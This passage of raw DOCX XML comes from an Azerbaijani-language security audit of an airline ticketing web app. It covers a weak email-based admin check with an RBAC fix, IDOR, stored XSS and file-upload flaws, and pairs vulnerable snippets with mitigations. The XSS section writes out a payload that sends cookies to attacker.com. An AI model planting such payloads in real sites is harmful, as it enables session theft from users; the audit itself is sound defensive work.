              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "full_name": db_user["full_name"],</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        # "password_hash" → HEÇVAXT frontenda getməməlidir</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 "query_probe", "sql_fragment" → produksiyada yoxdur!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">})</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4. Broken Access Control — OWASP A01:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>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Admin yoxlaması yalnız e-poçt sətri müqayisəsinə əsaslanır — bu, bir tək nöqtəli uğursuzluq (single point of failure) yaradır:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — api_admin_reports()  ⚠️ ZƏIF</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if session.get("email") != "admin@aviakassa.com":</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return jsonify({"ok": False, "error": "Admin hüququnuz yoxdur."}), 403</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Həmin e-poçtla qeydiyyat olunarsa, həmin istifadəçi avtomatik admin hesab edilir. Bundan başqa, rol yoxlaması yoxdur (rol DB-də saxlanmır), audit loqu yoxdur (kim nə vaxt paneli açıb bilinmir).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Düzgün Yol — RBAC (Role-Based Access Control)</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-- DB miqrasiyası: yeni cədvəl</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE TABLE user_roles (</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    user_id   BIGINT NOT NULL REFERENCES users(id) ON DELETE CASCADE,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    role      TEXT NOT NULL CHECK(role IN ('admin', 'moderator', 'user')),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    granted_by BIGINT REFERENCES users(id),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    granted_at TIMESTAMPTZ DEFAULT NOW(),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    PRIMARY KEY (user_id, role)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — düzgün yol</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">def user_has_role(user_id: int, role: str) -&gt; bool:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    cur.execute("SELECT 1 FROM user_roles WHERE user_id=%s AND role=%s", (user_id, role))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return cur.fetchone() is not None</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">@app.route("/api/admin/reports", methods=["GET"])</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">def api_admin_reports():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if "user_id" not in session:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        return jsonify({"ok": False, "error": "Daxil olun."}), 401</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if not user_has_role(session["user_id"], "admin"):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        log_admin_access(session["user_id"], "reports_view_denied")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        return jsonify({"ok": False, "error": "İcazəniz yoxdur."}), 403</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return jsonify({"ok": True, **admin_reports_data()})</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.5. IDOR — Düzgün Nümunə ✅</w:t>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Insecure Direct Object Reference (IDOR) — obyektə birbaşa istinad etməkdir. api_transaction_by_id() endpointi bu zəifliyi düzgün bloklayır: URL-dəki id-nin sessiyadakı user_id-yə aid olub-olmadığını yoxlayır. Bu, AND t.user_id = %s şərtinin əlavə edilməsi ilə həll olunur. Hər iki uğursuz hal üçün eyni 404 cavabı verilir — hücumçu fərqi bilmir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.6. Stored XSS — OWASP A03:2021 / CWE-79</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>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Stored XSS — zərərli skript server tərəfindəki DB-ə yazılır, sonra başqa istifadəçiyə göndəriləndə icra edilir. Layihədə iki problem bir arada Stored XSS yaradır:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Server tərəfi — api_me_profile()  ⚠️ SANİTASİYA YOXDUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">user_update_about_me(session["user_id"], about)  # about birbaşa DB-yə</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Client tərəfi — panel.js  ⚠️ innerHTML İSTİFADƏSİ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function renderPreview(html) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    previewEl.innerHTML = html || "";  // DB-dən gəlmiş mətn HTML kimi render</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Hücumçu about_me sahəsinə &lt;img src="x" onerror="fetch('https://attacker.com/steal?c='+document.cookie)"&gt; yazır, bu DB-yə saxlanılır; panel açıldıqda session cookie oğurlanır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitiqasiya</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446"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Üsul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kod/Kitabxana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">İzahat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Server sanitasiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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bleach.clean(raw, tags=ALLOWED_TAGS, strip=True)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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&lt;img&gt;, &lt;script&gt; kimi icazəsiz teqlər silinir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Client sanitasiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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DOMPurify.sanitize(html)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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DOM-da render öncəsi zərərli atributlar silinir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Ən sadə yol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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previewEl.textContent = text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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HTML render yoxdur — hər şey mətn kimi göstərilir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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CSP başlığı</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Content-Security-Policy: script-src 'self'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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Xarici mənbədən skript yükləməni bloklar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.7. File Upload — OWASP A08:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mövcud Müdafiə</w:t>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Layihədə whitelist yanaşması tətbiq edilib — yalnız .png, .jpg, .jpeg, .pdf genişləmələrinə icazə verilir. Bu doğru yanaşmadır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Qalan Problemlər</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2800"/>
        <w:gridCol w:w="6046"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6046"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">İzahat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Fayl adı toqquşması</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6046"/>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İki istifadəçi eyni adlı fayl yükləsə, biri digərinin üstünə yazılır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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MIME type yoxlaması yoxdur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6046"/>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malware.php.jpg kimi adlandırılmış fayl genişləmə yoxlamasını keçir, amma daxili PHP kodu daşıya bilər</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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PDF aktiv məzmun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6046"/>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PDF daxilindəki JavaScript bəzi oxuyucularda icra oluna bilər</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
